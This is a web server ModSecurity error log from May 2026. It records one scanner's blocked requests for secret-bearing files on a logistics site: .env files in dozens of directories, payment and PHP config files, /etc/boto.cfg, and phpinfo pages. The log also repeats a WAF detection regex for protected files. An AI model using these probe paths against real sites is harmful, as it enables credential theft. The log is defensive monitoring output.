[Tue May 26 14:48:50.022078 2026] [security2:error] [pid 648203:tid 648298] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/config/config.inc.php"] [unique_id "ahVlerEQDDtxJNiDrdTd4gAAn14"]
[Tue May 26 14:48:50.129149 2026] [security2:error] [pid 648203:tid 648209] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/config/config.php"] [unique_id "ahVlerEQDDtxJNiDrdTd6AAArQU"]
[Tue May 26 14:48:50.150814 2026] [security2:error] [pid 648203:tid 648211] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/config/env.php"] [unique_id "ahVlerEQDDtxJNiDrdTd7QAAmwc"]
[Tue May 26 14:48:50.166273 2026] [security2:error] [pid 648203:tid 648325] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/config/module.config.php"] [unique_id "ahVlerEQDDtxJNiDrdTd8AAA2Xk"]
[Tue May 26 14:48:50.166862 2026] [security2:error] [pid 648203:tid 648309] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/config/nexmo.php"] [unique_id "ahVlerEQDDtxJNiDrdTd8QAA2Wk"]
[Tue May 26 14:48:50.192549 2026] [security2:error] [pid 648203:tid 648323] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/config/stripe.php"] [unique_id "ahVlerEQDDtxJNiDrdTd9gAAh3c"]
[Tue May 26 14:48:50.334879 2026] [security2:error] [pid 648203:tid 648430] [client 209.50.160.32:43503] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlebEQDDtxJNiDrdTdjwAAAOY"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:50.438367 2026] [security2:error] [pid 648203:tid 648229] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/crm/.env"] [unique_id "ahVlerEQDDtxJNiDrdTeEwAA_Bk"]
[Tue May 26 14:48:50.438432 2026] [security2:error] [pid 648203:tid 648220] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/cron/.env"] [unique_id "ahVlerEQDDtxJNiDrdTeFAAA_BA"]
[Tue May 26 14:48:50.439902 2026] [security2:error] [pid 648203:tid 648231] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/current/.env"] [unique_id "ahVlerEQDDtxJNiDrdTeFQAAjxs"]
[Tue May 26 14:48:50.458790 2026] [security2:error] [pid 648203:tid 648216] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/demo/.env"] [unique_id "ahVlerEQDDtxJNiDrdTeFwAA8Qw"]
[Tue May 26 14:48:50.462280 2026] [security2:error] [pid 648203:tid 648223] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/dev/.env"] [unique_id "ahVlerEQDDtxJNiDrdTeGQAA9BM"]
[Tue May 26 14:48:50.464465 2026] [security2:error] [pid 648203:tid 648224] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/develop/.env"] [unique_id "ahVlerEQDDtxJNiDrdTeGwAAiBQ"]
[Tue May 26 14:48:50.465651 2026] [security2:error] [pid 648203:tid 648240] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/developer/.env"] [unique_id "ahVlerEQDDtxJNiDrdTeHAAAiCQ"]
[Tue May 26 14:48:50.473518 2026] [security2:error] [pid 648203:tid 648227] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/development/.env"] [unique_id "ahVlerEQDDtxJNiDrdTeHQAA6Rc"]
[Tue May 26 14:48:50.486030 2026] [cgid:error] [pid 648203:tid 648217] [remote 195.178.110.199:55984] AH01264: stderr from /home2/onesomzc/public_html/www.landsonlogistics.com/dnscfg.cgi: script not found or unable to stat
[Tue May 26 14:48:50.633281 2026] [security2:error] [pid 648203:tid 648259] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/erp/.env"] [unique_id "ahVlerEQDDtxJNiDrdTeOAAA7zc"]
[Tue May 26 14:48:50.726520 2026] [security2:error] [pid 648203:tid 648244] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/etc/apache2/apache2.conf"] [unique_id "ahVlerEQDDtxJNiDrdTeOgAA1yg"]
[Tue May 26 14:48:50.727234 2026] [security2:error] [pid 648203:tid 648218] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/etc/boto.cfg"] [unique_id "ahVlerEQDDtxJNiDrdTeOwAA1w4"]
[Tue May 26 14:48:50.729136 2026] [security2:error] [pid 648203:tid 648226] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/fe/.env"] [unique_id "ahVlerEQDDtxJNiDrdTePAAA0RY"]
[Tue May 26 14:48:50.750841 2026] [security2:error] [pid 648203:tid 648276] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/front/.env"] [unique_id "ahVlerEQDDtxJNiDrdTeQQAA5Ug"]
[Tue May 26 14:48:50.753164 2026] [security2:error] [pid 648203:tid 648275] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/frontend/.env"] [unique_id "ahVlerEQDDtxJNiDrdTeQgAA_Uc"]
[Tue May 26 14:48:50.871715 2026] [security2:error] [pid 648203:tid 648261] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/info.php"] [unique_id "ahVlerEQDDtxJNiDrdTeUAAAmTk"]
[Tue May 26 14:48:50.871814 2026] [security2:error] [pid 648203:tid 648281] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/infophp.php"] [unique_id "ahVlerEQDDtxJNiDrdTeUQAAmU0"]
[Tue May 26 14:48:50.874448 2026] [security2:error] [pid 648203:tid 648269] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/infos.php"] [unique_id "ahVlerEQDDtxJNiDrdTeUgAA8kE"]
[Tue May 26 14:48:50.878665 2026] [security2:error] [pid 648203:tid 648286] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/laravel/.env"] [unique_id "ahVlerEQDDtxJNiDrdTeVQAAsFI"]
[Tue May 26 14:48:50.884072 2026] [security2:error] [pid 648203:tid 648285] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/lms/.env"] [unique_id "ahVlerEQDDtxJNiDrdTeVwAArVE"]
[Tue May 26 14:48:50.899665 2026] [security2:error] [pid 648203:tid 648249] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/local/.env"] [unique_id "ahVlerEQDDtxJNiDrdTeWQAArC0"]
[Tue May 26 14:48:50.905118 2026] [security2:error] [pid 648203:tid 648293] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/market/.env"] [unique_id "ahVlerEQDDtxJNiDrdTeXQAAqlk"]
[Tue May 26 14:48:50.911782 2026] [security2:error] [pid 648203:tid 648282] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/marketing/.env"] [unique_id "ahVlerEQDDtxJNiDrdTeXgAAm04"]
[Tue May 26 14:48:50.966205 2026] [security2:error] [pid 648203:tid 648300] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/media/.env"] [unique_id "ahVlerEQDDtxJNiDrdTeYwAA4WA"]
[Tue May 26 14:48:51.023590 2026] [security2:error] [pid 648203:tid 648301] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/new/.env"] [unique_id "ahVle7EQDDtxJNiDrdTeZwAAu2E"]
[Tue May 26 14:48:51.025234 2026] [security2:error] [pid 648203:tid 648283] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/node-api/.env"] [unique_id "ahVle7EQDDtxJNiDrdTeaAAAsk8"]
[Tue May 26 14:48:51.025898 2026] [security2:error] [pid 648203:tid 648314] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/node/.env"] [unique_id "ahVle7EQDDtxJNiDrdTeaQAAsm4"]
[Tue May 26 14:48:51.029313 2026] [security2:error] [pid 648203:tid 648207] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/node/api/.env"] [unique_id "ahVle7EQDDtxJNiDrdTeagAA3wM"]
[Tue May 26 14:48:51.042744 2026] [security2:error] [pid 648203:tid 648264] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/node/backend/.env"] [unique_id "ahVle7EQDDtxJNiDrdTeawAA7Dw"]
[Tue May 26 14:48:51.045061 2026] [security2:error] [pid 648203:tid 648304] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/nodeapi/.env"] [unique_id "ahVle7EQDDtxJNiDrdTebAAA2GQ"]
[Tue May 26 14:48:51.046454 2026] [security2:error] [pid 648203:tid 648302] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/nodeweb/.env"] [unique_id "ahVle7EQDDtxJNiDrdTebQAA3WI"]
[Tue May 26 14:48:51.056849 2026] [security2:error] [pid 648203:tid 648279] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/old/.env"] [unique_id "ahVle7EQDDtxJNiDrdTecQAAqEs"]
[Tue May 26 14:48:51.100226 2026] [security2:error] [pid 648203:tid 648384] [client 176.65.139.233:55918] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.newtest.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVle7EQDDtxJNiDrdTedgAAALg"]
[Tue May 26 14:48:51.111709 2026] [security2:error] [pid 648203:tid 648253] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/opt/.env"] [unique_id "ahVle7EQDDtxJNiDrdTedwAAjjE"]
[Tue May 26 14:48:51.262306 2026] [security2:error] [pid 648203:tid 648316] [remote 74.7.241.58:37816] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVle7EQDDtxJNiDrdTeiwAAuXA"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/bn
[Tue May 26 14:48:51.313977 2026] [security2:error] [pid 648203:tid 648325] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/php-info.php"] [unique_id "ahVle7EQDDtxJNiDrdTejwAAyXk"]
